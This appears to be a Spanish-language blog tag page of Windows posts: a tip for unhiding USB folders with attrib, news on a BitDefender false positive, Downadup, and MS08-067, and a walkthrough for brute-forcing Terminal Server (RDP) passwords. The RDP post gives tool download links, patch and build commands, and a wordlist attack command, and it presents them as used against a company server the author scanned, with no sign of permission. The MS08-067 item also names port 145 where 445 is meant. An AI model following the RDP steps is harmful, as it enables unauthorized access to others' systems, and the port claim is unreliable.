Posts Tagged ‘Windows’

Recuperando carpetas ocultas en un Pendrive

noviembre 16, 2010

Seguramente a muchos les ha traido mas de un dolor de cabeza aquellos ‘virus’ que infectan las memorias USB (pendrive) cuando lo usamos en alguna cabina internet , la oficina o la universidad.

Pues bien, se ha hecho regular que al descubrir que dichas carpetas están con atrubutos de oculto y sólo lectura, estas propiedades no se les puede cambiar desde el explorador de Windows, algunos recurren al winrar para visualizar sus archivos.

La solución es bastante rápida.

Abrir una consola de MS-DOS, ubicarte en la carpeta o directorio que contiene las carpetas que estan ocultas.

Escribir en la linea de comandos:

>attrib -h -s -r *.* /s /d

y listo todas las carpetas se habrán restablecido las carpetas.

donde:

-h para quitar el atributo de oculto
-s para quitar el atributo de archivo de sistema
-r para quitar el atributo de solo lectura

/s realiza la acción en los archivos contenidos en la carpeta actual y las subcarpetas.
/d realiza la accion en directorios o carpetas

ATTRIB Linea de comandos ms-dos

Anuncios

Cracking pass of MS Terminal Server

noviembre 10, 2010

Rdesktop for Terminal Server

Hace unas semanas escaneaba un Web Server y me sorprendí al ver que tenía muchos puertos abiertos, 110, 21, 22 25, 443, 3389, 80, 993, 995 realmente para publicitarse como una empresa sería y segura no creí que tenga un buen esquema de seguridad con muchos servicios y puertos abiertos en un mismo Server.

Decidí probar con el 3389 de Terminal Server para saber si soportaba conexión remota a través de mi conexión ADSL, pues si soportaba, solo hacía falta saber la contraseña.

Atacando al RDP MS Terminal Server usando Backtrack 4

1. Actualizamos y parchamos Rdesktop.

Descargamos:

Rdesktop 1.5
http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.5.0.tar.gz

RDP Brute force patch r805
http://www.foofus.net/jmk/tools/rdp-brute-force-r805.diff

Creamos una carpeta para las descargas

mkdir rdesk

A continuación, descomprimimos.

tar -xvzf rdesktop-1.5.0.tar.gz
cd rdesktop-1.5.0

Parchamos rdesktop para que pueda hacer el ataque de fuerza bruta

root@bt:~/rdesk/rdesktop-1.5.0# patch -p1 -i rdp-brute-force-r805.diff
patching file Makefile.in
patching file configure
patching file orders.c
patching file orders.h
patching file rdesktop.c
patching file rdesktop.h
patching file rdp.c
patching file secure.c
patching file xkeymap.c

Compilamos e instalamos

./configure
make
make install

Ahora ya tenemos la nueva versión de rdesktop lista para hacer el ataque

2. Realizando el ataque

En la línea de comandos escribimos:

#rdesktop -n Administrador -p /ruta/wordlist.lst 72.28.xxx.xxx

Antivirus paralizó Windows

marzo 23, 2010

Una actualización defectuosa hizo que el antivirus BitDefender trasladara diversos archivos de Windows (64-bit) a cuarentena, debido a que la actualización considera que están infectados por el malware “Trojan.FakeAlert.5”.

El foro de usuarios de BitDefender estuvo durante el fin de semana colmado de indignados comentarios. Uno de los frustrados usuarios comenta que todo archivo que intenta ser ejecutado, incluyendo el explorador de Windows y las actualizaciones del propio BitDefender eran puestas en cuarentena.

BitDefender admite en su blog que el error resultó, en algunos sistemas, en que algunos programas dejaran de funcionar y que incluso Windows no pudiera ser iniciado.

La empresa reaccionó con rapidez y a las 07:00 hrs. del domingo 21 de marzo había publicado un parche reparador para la versión 2010 de BitDefender. El parche para la versión 2009 será publicada lo antes posible, informa la empresa.

Bitdefender ha publicado en su web 2 comunicados al respecto.

Problema con Actualización: Trojan.FakeAlert.5.
Carta abierta a los usuarios de BitDefender.

Extraido de: DiarioTI

Un terrible virus amenaza el sistema Windows

enero 16, 2009

El virus conocido como Downadup se ha convertido en el peor de los últimos años, al afectar a más de 6,5 millones de ordenadores.

Un virus informático registrado esta semana y conocido como “Downadup” se ha convertido en el peor de los últimos años al afectar a más de 6,5 millones de ordenadores que operan en base al sistema Windows, informó hoy la compañía de seguridad en Internet F-Secure.

“La cantidad de infecciones de Downadup es impresionante”, comentó un investigador de F-Secure, Toni Koivunen. “De lo que se calculaba que serían 2,4 millones de máquinas infectadas pasó a afectar a más de 8,9 millones en los últimos cuatro días. Es increíble”, comentó el especialista.

Según la compañía Microsoft, el gusano informático estaría buscando un fichero ejecutable de Windows llamado “services.exe” para luego proceder a formar parte de ese código.

Según la firma de antivirus, el gusano informático utiliza un algoritmo para lograr cientos de nombres de dominios diferentes cada día, tales como mphtfrxs.net, imctaef.cc y hcweu.org., por lo que sería complicado rastrear ese sitio.

Por ahora, los expertos han logrado revertir este virus, prediciendo algunos de los posibles nombres de los dominios. Este proceso no ayudaría a averiguar quiénes son los responsables, pero al menos se obtendría la cantidad exacta de las máquinas afectadas.

Si los ordenadores tienen sus programas antivurs al día, no tienen qué temer.

Fuente: ElComercio.com.pe

Vulnerabilidad Critica en Windows

octubre 24, 2008

Microsoft ha publicado un parche de seguridad para corregir la vulnerabilidad zero-Day que afecta a todos sus sistemas operativos, 2000, XP, 2003, Vista y 2008. La vulnerabilidad conocida como MS08-067 está considerada como una vulnerabilidad crítica.

MS08-067 ya ha sido explotado, permite la ejecucion remota de codigo a través del servicio “servidor” de los sistemas operativos Windows

La recomendación es aplicar los parches de seguridad y bloquear los puertos TCP 139 y 145

Mas información:

http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx